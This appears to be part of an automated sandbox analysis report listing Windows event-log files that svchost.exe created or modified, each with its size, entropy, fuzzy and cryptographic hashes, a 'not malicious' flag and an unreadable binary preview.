                                                                              Preview:ElfChnk.........K...............K...........H...0...... .....................................................................|..................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n................................................{......................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.318227577210551
                                                                              Encrypted:false
                                                                              SSDEEP:768:5cMhFBuyKskZljdoKXjtT/r18rQXn8BiJCF9Hhr:CMhFBuV
                                                                              MD5:5C633A280FB6049ED65FB3D9FB6ED41D
                                                                              SHA1:EA8D9B84B69F08E866CEE93019E7D9D2F2055666
                                                                              SHA-256:C173BD37497EC6CC0B01BDBD0F2813644D398457279644AEDA0F9925E546091F
                                                                              SHA-512:3E040021C7ABF4B9242BA0851F377EB0B077A1CFCAC0E012A4AB7E2551157BF7AC70E979A6F7225A3E260D5C393DBACAA78831C0BC46356C966A524271CC57CF
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........M...............M..............8...^..Q....................................................................q...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A.........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.894276729929611
                                                                              Encrypted:false
                                                                              SSDEEP:768:8AiyQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZavAFDtCwvhr9LHe:QHur
                                                                              MD5:D72F77DC863118FEB7F92DEDAB556112
                                                                              SHA1:495DE9862DC6A0293B3BA190232E6F3503E2CF7C
                                                                              SHA-256:DCA7462E1BC2C1BBA0A80ED09EA2A4EF534E96F0BB5980A5E614FE3820434062
                                                                              SHA-512:792E81A5C2DAF913E256EE74E9172F2F760F5C7A02B4B12E2B7774C6467080D88B540D8A850595AF47E3DC516256CD4781B5F1C192EA1016E6E8C6B97B92A0E6
                                                                              Malicious:false
                                                                              Preview:ElfChnk.v.......x.......v.......x...........P...`...2m.N....................................................................@...........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..@...v........T..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.9991173293907214
                                                                              Encrypted:false
                                                                              SSDEEP:384:ih1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:iMAP1Qa5AgfQQzy
                                                                              MD5:136C76E352B55506EBDFC639C5C5E0AE
                                                                              SHA1:282AB441407769A38D5BEDD002011A1CDF08EBB5
                                                                              SHA-256:35F4E45C5372A7607858D64133D8F47A0F4BA7CFC431FCEB2FB03CA17F94F6ED
                                                                              SHA-512:AA8C840BBBEE9632F9FFA006E51C892E9621CEB4825DE28C751A7BB933A96A303D31F676E0260C7097A3013EBC27CC281C3017F3FC035B09077F0BDF681AF161
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................c...f...{PX.......................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&.......\......;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.441017411582523
                                                                              Encrypted:false
                                                                              SSDEEP:384:BhdERE5EUELEvE/EpEbEmEfEjoPjE4FEqEZEVEiEUhqEd/2EME0EHE+EIy4qEQi0:BQoPjvh7jhHl7lzuzbCN7y+D
                                                                              MD5:8D30244BF7119CFA2F8A7A5AF8FCDAB7
                                                                              SHA1:F0827675265E0DF98A4967D8A539D476551DCAA6
                                                                              SHA-256:489E810931FD45E6D7620FE65EBF1F1A66235B06E572C2C293BD080EE1C8E1ED
                                                                              SHA-512:C71504A8F8D370825FC0C8C605B9F7217EFF2025838ED8FDF3F04CCC41E86751659BB60C7E79C48BBDDC1089C771DD16A193C107DDE4A1487F037BB2FC1455B8
                                                                              Malicious:false
                                                                              Preview:ElfChnk.q...............q....................i..Pk..buI......................................................................o._................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F........................................7...(..................};...........?..M=.......9..............U*..&....$..........."..............=1......**......q........|.xf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.2803522685445374
                                                                              Encrypted:false
                                                                              SSDEEP:384:RhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl0:R1T4hZovIZC7
                                                                              MD5:4A70DB2946C129829BEDDB2E147FBE04
                                                                              SHA1:4D3255FABE0E857840591072D9370047FDDFB83A
                                                                              SHA-256:C10981A84E3884E62907E34159FB7AA2D1F908C3E328D8D8B942B9934DFDE09C
                                                                              SHA-512:7FDBE43D4773CBC17A3879CBC012F8C9FC823529DDF6FE5E10C623B2D7AA89159132F10FE01C0632B6F8F92A0C474C67EF1D5DA4DC2EDC3CA5499D6220922AA4
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........k...............k...........................................................................................<../................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.445920452673848
                                                                              Encrypted:false
                                                                              SSDEEP:384:ihFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDff:izSKEqsMuy6SbKrTPpOIKm
                                                                              MD5:21B26F726BBEBA7FD5C4C45386FC544F
                                                                              SHA1:F6CC3E80D2AD9D2F420C42D7DA3AA3C48C9D956A
                                                                              SHA-256:63E1A62EA280BF1B031E1C98FBF21FF88795119983E5BC96C036B8EEF30D325D
                                                                              SHA-512:A28CB789E4967DB231359AFE7D221C55A57FB56EF899997EBAA0F79EBD92D34547530A64B4B5492400ABFC81631E5ED792D47B836525E5E1583BA6F656062DD5
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........L...............L......................f....................................................................s.J.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=........................................f......................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.1562721664799103
                                                                              Encrypted:false
                                                                              SSDEEP:384:BhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3z2:Bmw9g3LQ
                                                                              MD5:B2C3D7448B237C268D23FE1A78777AA5
                                                                              SHA1:6C3A39325392F2B088C00CDC1763268F15832447
                                                                              SHA-256:05BC150DCBE6B62CE7D2A9CB8F706130DF70BABC54752199B02B4C91ACEE1C4E
                                                                              SHA-512:F9286BC0FC6DB6C52295C0292E2BF732C010F2D542999085F999501AC555C317FB1AFED9A2FF2DF6D91913373D0A32D2307C707381419883F5605F1D67DEE70E
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........6...............6...........(o...p....Zo....................................................................ZU.#................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#.......................................^^......................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.9195298486885948
                                                                              Encrypted:false
                                                                              SSDEEP:384:3hPIRbiY8SIUIi0IsIGIAICI5I2IBIaIKI+I3lKaZrIVlKaZOITTIwI:3LQ9KC8KCV
                                                                              MD5:D4A00CC59E964B7DFD6EFDB643322E9E
                                                                              SHA1:7307AF862B22D743BF6B531829DABE041E9F1F92
                                                                              SHA-256:49414D51861772E0899416FE42628F8641622E9F793F435DE7F0118F45EDE065
                                                                              SHA-512:51663BF2E9D8F1FA3BA6B87918CD36A02AFC2F53FF89F3ED104A4B4129682F0947DC825912A81844E2D25083E7249CE7C1EE8F899D847F511AB20B0404B22F27
                                                                              Malicious:false
                                                                              Preview:ElfChnk.K.......L.......K.......L...........x...86..........................................................................E.U.................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..x...K.......1..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 128, DIRTY
                                                                              Category:modified
                                                                              Size (bytes):1052672
                                                                              Entropy (8bit):0.4508192875531036
                                                                              Encrypted:false
                                                                              SSDEEP:768:ZnKx9PIEQ8QtnkVKRNlY20sMY3Dp13/n/ydIxm6g/ZSi+uQ/NujMAEWD4gm/Rg6j:Rp
                                                                              MD5:C1ADB61FD0BE545CD03CDAC76FD2321F
                                                                              SHA1:CEBD85B29002AED60DBFAA93F8ABDD5B4840EEB0
                                                                              SHA-256:0E25540CA2ACA178D123DD4AA71FE8B08BBFEC5D820F4FFECCFB70EE115C0232
                                                                              SHA-512:39B9A0766B8F9240B16A8BE2AFC381E64DD18D2D8831BAEDDC16EFABDD330A00868B1B2FB3921C2691CD0B364E193ECDA5D4C3268016A5E569FF9E928BE3C473
                                                                              Malicious:false
                                                                              Preview:ElfFile.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.119748237037944
                                                                              Encrypted:false
                                                                              SSDEEP:384:Sh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpRaMRlM7kMGU:SeJB
                                                                              MD5:D1CFC256BC075DC75D7FD92207C9C0F2
                                                                              SHA1:587C19CF65305AD470E82AB5A1ED5B2E36472625
                                                                              SHA-256:6C0365C674BCE55E0C49A62D23782660D34ECB388A8A7418AD9A75DFD36E612E
                                                                              SHA-512:85F88C26274975D8EB8DDC65297064427A103B557712BD46F459B8E26A1B7E38DA3B4674920FA61476D108BA3B9846430F59AA82926AFEBDCE92B25A527331A3
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................1..p3..\q........................................................................_U........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................,......................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.182756017330751
                                                                              Encrypted:false
                                                                              SSDEEP:384:9hk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1B:9BjdjP0csdHkp
                                                                              MD5:9BA8F6B60705B6A27084436D1D4370AD
                                                                              SHA1:DCAFEC9C3F76CCE3FF65F8FED6E373B863780B6E
                                                                              SHA-256:580E71D95D6201104E37944E8A0A6596869D6C8A0CA2CD3B704FEFC9D319C957
                                                                              SHA-512:BFBAEA71174AEE5233857BFDB4427C59D945A3797EA6F5D02708807321E0ADD12ED632BAA3C5E59141CFEF108FADE90315AB670BB960A281D0E95DB18C4976A4
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................8.......I#.e......................................................................hB................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.1664631857982
                                                                              Encrypted:false
                                                                              SSDEEP:384:s3hDIEQAGxIHIFIWwIfyITMIcIZIMIf0ITEIAI/IuIGvqIfIOIOIv0IfCOiIThI6:s3ZxGe6dm
                                                                              MD5:3B1AC483EC9905DB0C1D0E675CB55DCA
                                                                              SHA1:FA2D06F63A2D2E9229D38A4B272CAA97BCE1BAB7
                                                                              SHA-256:089DD08CC07D9DBF14CA3044E8F591CA1AF2C8A57E182D72365F8EFC26CBA53C
                                                                              SHA-512:89CB9D1D32296E58B6A2FD9519379D529A24D3968E7036A502709D8167A8F69E541845E181AC520A2FCB56817A075F7BD3093A6595C09DE2BCFE17BE76F1E838
                                                                              Malicious:false
                                                                              Preview:ElfChnk.T...............T............................D}.....................................................................,..P........................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1............................V...........6..........................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.800476718060657
                                                                              Encrypted:false
                                                                              SSDEEP:384:7h6iIvcImIvITIQIoIoI3IEIMIoIBIzI9IwWInIE1IFtI:7oxqV
                                                                              MD5:F25E3A5940E51F9A49AC271DE377E2C1
                                                                              SHA1:38EB4D0BCB8EA4C72C03AD88CF9B7136C39BCDC5
                                                                              SHA-256:D2B29761907A72BE3EC03C586D87729FF91EE3D9A6CF39319FD90A1977602663
                                                                              SHA-512:CADA8EFD9868D26AA1B4DBC5A5BDD31E624547E5755ED7B413EA74D69AB731B000BB2B8FCBDD3027FDA278A7D69058DF4BE3BAEE5AB253055C70EDE7D3AA9993
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................X"...#.../......................................................................V)..............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.999140584854273
                                                                              Encrypted:false
                                                                              SSDEEP:768:q4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH135:o
                                                                              MD5:5234109523F4243D8DFEEAFD9202BC60
                                                                              SHA1:49A4B237FB8BEE3A2BDAA0C20A579E06D2645F65
                                                                              SHA-256:D4CE68FD0E970CC24971E8258B962534A3BF7CB1F1E6209AA0BB1D09F4FB80E6
                                                                              SHA-512:C2CC9A4E7282BF37C4113FADBA4F7FDD1D2094B8F40FE145C58A5ABEE4A90BCD55FBD8876415BD9140EBEE36314D02FEE5525076B539BB5AA01FB1D32058B426
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................(...8...|.........................................................................6................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):76320
                                                                              Entropy (8bit):4.029279961362116
                                                                              Encrypted:false
                                                                              SSDEEP:768:uaRow407SZRcZv76NcRkpHrWbGyYKQc90X9ztputDBjV8k+i7eUtHpoVWWejRKvh:UztputDBjV8k+i7PtHpoVWo
                                                                              MD5:FA1CAA68A5988248B5787DC1DEA9CD3C
                                                                              SHA1:566F8B2D156E91D9DC308735EF6D83D78094CDA2
                                                                              SHA-256:12A3A381CBBFE40F3CD9FF015B3A21079827473360FD0B6731E5AF7939CC2258
                                                                              SHA-512:BD124B39E004B9EF3E7A4326EBD1F1D5E760D5F1F850F5745A15FA6C73AB1DA41FD3EE9BFE98CC30A2A11B9AE4AA50E05E0F7B2AE8F2A08397CF091E2EE6439A
                                                                              Malicious:false
                                                                              Preview:ElfChnk.................J.......O...........0........!f.........................................................................................2...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..`...J.......+.w..1.........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.419032545541079
                                                                              Encrypted:false
                                                                              SSDEEP:384:BhWKyzK5SK+jKLSKDlKMAwpTKZDGKPK9KyKJSK2KVKzKAGP1K6GSKzKhMK7KS3K9:BIgpCnz/Gh4wRub4Z2LqQ6QE
                                                                              MD5:822F854D66FEFEEB2924E69852576E0A
                                                                              SHA1:90D085D1E72EC8354B42E986346F686A21AF1377
                                                                              SHA-256:4F03F811C2FDAE7DFB65037D96439139F4C055FAC42E44E0DBCE21BBD6CBE7E5
                                                                              SHA-512:C693C88BFE1AAF1430E3660FCDF8DF166B0CA78220153E78A471C42A922B75CB0FDD929455568BDAFA3B7D571F209950D06B891B734124A9441E40FA58546947
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........[...............[...............H...]./......................................................................?wC................p...........................=...........................................................................................................................f...............?...........................m...................M...F.......................................................'f.......D...T.......................s..........O....p...h............../$...............}..**................qdf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.760021633915647
                                                                              Encrypted:false
                                                                              SSDEEP:384:4hP8o8Z85848V8M8g8D8R8E8C888FB8J8a8:4R
                                                                              MD5:91415CB1A68CB19DCDB017402AAEB51E
                                                                              SHA1:EEEB808B9D0DFB3DB247AA10B64290A5029EAB89
                                                                              SHA-256:EDEE7AB462BF2D986393D24304BDEF02415A6E0483DE793BD452E169B7D08170
                                                                              SHA-512:C2F5AF43559DCE7BB66ABE305DF2DCFF0C95E2CF431D8DD0B6A02E216C8F4329C3B888BF2BF378918851A3066976FCEE745593B60970E5B9843535E6301E5BA0
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........................................8!..$.0v....................................................................>...........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.7642287366138047
                                                                              Encrypted:false
                                                                              SSDEEP:1536:HXhhUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:HX/nS
                                                                              MD5:EB0F3C0C854FB5C701A0887F1BB4D397
                                                                              SHA1:160BE6E94DAC6032A55870B7986C15D0349F5174
                                                                              SHA-256:F6C427F87861DB832A3CDBDFD6FCDA2CB3AEB40D0FAF01B83DCF11DE06E307FC
                                                                              SHA-512:B20EA8AEB6F822A1C2C206EFB6E6F7D6AB65B922578BDDC67D18D2E402D92966E7828B942F81739BD605C1E382C3C256C84512C854E106DCE099EBA7250D5266
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........'...............'............I...J...[.,......................................................................F.................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................>..............O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.4373812410985773
                                                                              Encrypted:false
                                                                              SSDEEP:768:50VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9OaafcmafEMXW0OWkjWr:jcEt
                                                                              MD5:5166C2E32BD35C5E8D122799E53B4EA3
                                                                              SHA1:628619C0E31F8C29ED260FCC063CD27935ACC25C
                                                                              SHA-256:433A96E20784F1E6FB099FA4AB020EEA75BB22EEBC7D969497A31ABCB9B415AB
                                                                              SHA-512:E5EA93AA871264E180BBC67008D7AA1012CDCAC74D22D10B47F1849380E092DF2FD798C7143DD3CAB5D9192EB4A89BB0EE60DA662E626923551906AB8F31DFD9
                                                                              Malicious:false
